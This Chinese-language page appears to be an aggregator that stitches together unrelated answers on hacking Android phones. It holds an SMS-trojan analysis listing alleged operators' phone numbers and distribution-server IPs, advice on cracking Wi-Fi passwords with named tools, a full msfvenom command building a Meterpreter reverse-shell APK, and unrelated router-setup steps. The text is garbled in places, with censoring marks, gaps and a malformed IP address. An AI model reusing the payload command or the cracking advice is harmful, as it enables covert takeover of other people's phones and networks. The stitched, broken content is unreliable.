本文目录一览:
- 1、渗透攻击实例-利用手机短信进行的入侵
- 2、如何利用wifi局域网渗透安卓手机
- 3、如何使用Metasploit对安卓手机渗透控制
- 4、如何使用Metasploit对安卓手机进行控制
- 5、手机渗透/修改wifi密码
渗透攻击实例-利用手机短信进行的入侵
木马利用短信感觉受害者通信录中好友.利用"看你做的好事","看你做的龌龊事"等语句诱导用户安装.
开始分析木马,首先查看其Manifest文件.从其申请短信/联系/联网的权限来看已经可以基本确认这是一款短信拦截马,貌似没啥新意不过可以从中发现一些以前没有的细节.感觉这个木马还是挺用心的。
首先是installLocation属性的设置.
设置这个属性的目的是不让木马 app 被安装到 sdcard 中.因为如果 app 被安装 sdcard 中而非手机内置存储的话会失去以下特性导致木马的功能不健全
第二个有意思的点 excludeFromRecents 是在 activity 标签中设置的.
这样设置的目的是不让木马 app 现在在最近程序列表中减少被普通用户发现的概率.类似处理还有将此 Activity 在代码中 disable
第三个特点是随机字符串包名
要抓取几个样本后发现,包名是随机的字符串,但是代码特助以及签名都是一样的.应该是通过程序自动生成的,猜测目的是躲避一些杀软.
继续观察程序入口点: 1.主Activity,用户点一次后将会被禁用
功能老几样:
sevice 的主要功能是
其他入口点: 2.开机广播 3. *** 切换广播 4.短信相关广播 ,总计4处可以触发拦截马行为.
短信广播接收器和观察者的代码就不贴了,发出的邮件是这样的:
那么这个木马是肿么存储邮箱帐号木马的了,发现这些个短信马都喜欢用163.
这款木马选择对邮箱帐号密码使用 des 加密.破解这个也很简单现在有三个途径:
大概两天不到的时间已经有上千受害者中招,部分数据如下:
通信录
短信记录
总结木马功能:
在这些用 *** TP 上传受害者信息的短信木马中,有些木马作者比较 low 就直接硬编码在 java 代码中,有些会选择像上述的加密,也有往底层迁移
木马传播途径:
1.伪基站钓鱼定向群发
2.受害者感染通信录好友
木马使用者手机号码:
15168430384
13894651855
13660414800
13430222795
已验证为黑卡,未实名认证.
传播站点:
118.193.170.149:2100
118.193.157.132:1123
主要来自香港的 VPS.
如何利用wifi局域网渗透安卓手机
你要明白所谓wifi就是无线 *** 技术,wifi的密码破解其实就是蹭网的过程,也是要蹭网卡(必须蹭网软件支持的无线网卡)用蹭网软件进行抓包破译人家无线 *** 的密码,蹭网软件常用的几种如bt3,bt4,beini(奶瓶)
如何使用Metasploit对安卓手机渗透控制
首先,你要知道metasploit俗称msf。你应该先了解一下里面的exp。要知道通过哪个exp可以对安卓系统的入侵。
如何使用Metasploit对安卓手机进行控制
打开vm启动Kali linux。接着打开终端,使用msfvenom *** android利用程序。
Msfvenom是msfpayload和msfencode的组合。它是一个单一的工具。它有标准的命令行选项。 Msfvenom用来制造的有效载荷用来渗透Android模拟器。
一旦打开终端提示符下输入以下命令,使用msfvenom工具来创建有效载荷APK文件。
```
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1128 LPORT=4444 R /root/Desktop/pentest.apk
```
p 设置要使用的payload
LHOST 设置用来接收反弹连接的主机
LPORT 设置用来接收反弹连接的端口
R 设置文件格式
Location 要保存的文件位置
这个命令执行完之后,你会看到一些错误,但不用担心。现在可以到输出目录查看生成的apk了。
望采纳,谢谢。
手机渗透/修改wifi密码
1、打开浏览器,在地址栏输入路由器网关IP地址,用户名和密码一般如果你没改就是admin( 小写)
2、登录成功后就显示运行状态了,点击“无线设置”
3、再点击“无线安全设置”,无线 *** 名称(SSID),就是一个名字,你可以随便填,一般是字母+数字。 接下来就可以设置密码了,一般选择WPA-PSK/WPA2-PSK加密 *** (密码 要8-16个的,可以字母数字 组合)
4、设置密码后,点击保存,提示重启
5、最后点击“系统工具”里的“重启路由器”即可重启路由。